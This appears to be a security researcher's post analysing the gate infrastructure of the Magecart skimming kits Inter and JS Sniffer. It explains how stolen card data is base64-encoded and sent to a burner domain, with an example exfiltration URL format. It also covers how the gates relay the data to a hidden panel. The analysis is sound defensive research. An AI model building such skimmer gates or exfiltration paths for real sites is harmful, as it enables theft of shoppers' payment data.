Digital skimmers will use a variety of infrastructure setups to help hide the real servers. This varies by the script that is being used, but in general you will see three different hosts involved:
- Host 1: Skimmer Loader
- Host 2: Exfil burner domain / gate
- Host 3: Magecart Panel / c2
Host 1 and 2 are sometimes the same, but the goal here is to hide the third host from prying eyes. The idea here is to hide the important stuff, the Panel behind a shroud that can’t easily be pierced. The code for these gates is rather simple, but let’s take a look at two examples.
This first one is Inter. The host where Inter is actually living is entered on line 3 (the Inter gate route is simply /gate or /gate/proxy) and this file is placed on a burner domain or, commonly, some compromised system.
Let’s say the exfil server was http://burner.example.com
. The Javascript skimmer base64 encodes your payment info, builds a URL with it, and does a get
request. The get
request is frequently disguised as an image, but the basic URL format is http://burner.example.com/gate.php?hash=<base64>
You can see how Inter takes that information, appends the victims IP and User Agent, and uses file_get_contents
to pass it along to the Panel/c2, which is hidden from prying eyes because this network call is server to server.
Inter has two routes setup. One is /gate and it only concerns itself with the base64 encoded payment info. The other one is /gate/proxy and it will parse out the IP address and User Agent.
Those routes pass the data to two functions: Incoming and Proxy. Both do similar things, Proxy just parses out the IP and UA arguments as well.
Now let’s look at how JS Sniffer handles things. It comes with a file named prokladka.php
. Prokladka or прокладка in Russian means gasket (and other things). Similar functionality to the gate.php
file in Inter, except for it drops a cookie.
On line 5 you specify the URL of the gate.php
file, which should be on Host 3 as defined above. The unique thing it then does it checks for a cookie and drops one if its not found. It then passes that cookie along as part of the final payload. The JS Sniffer gate.php
file does a couple things. It grabs the data that was passed along and then, depending on what $sniffer_type
was set, it parses things differently.
Interestingly, Sochi (the author of Inter) is a better coder than Poter (the author of JS Sniffer). Inter is a decent MVC app. JS Sniffer is kind of just base level PHP. Examples of JS Sniffer handling different $sniffer_types:
And there you go. A look into $6k+ of illicit magecart packages. It’s really rather basic stuff, but it’s the domain knowledge that was used to craft it that makes it somewhat valuable.
A modified version of this was originally posted on Twitter:
https://twitter.com/AffableKraut/status/1160432974778851328